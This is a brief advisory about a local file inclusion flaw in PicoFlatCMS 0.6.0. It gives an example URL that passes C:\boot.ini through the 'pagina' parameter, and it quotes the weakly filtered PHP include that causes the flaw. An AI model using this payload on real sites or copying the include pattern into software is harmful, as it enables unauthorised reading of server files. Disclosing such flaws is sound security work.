PicoFlatCMS 0.6.0 LFI http://www.sourceforge.net/projects/picoflatcms Same old thing: http://site/index.php?pagina=C:\boot.ini Fixme: if (eregi("\:\/\/", $pagina) || eregi("\?", $pagina)) { $pagina = ""; include "notfound.php"; }else{ include $pagina; }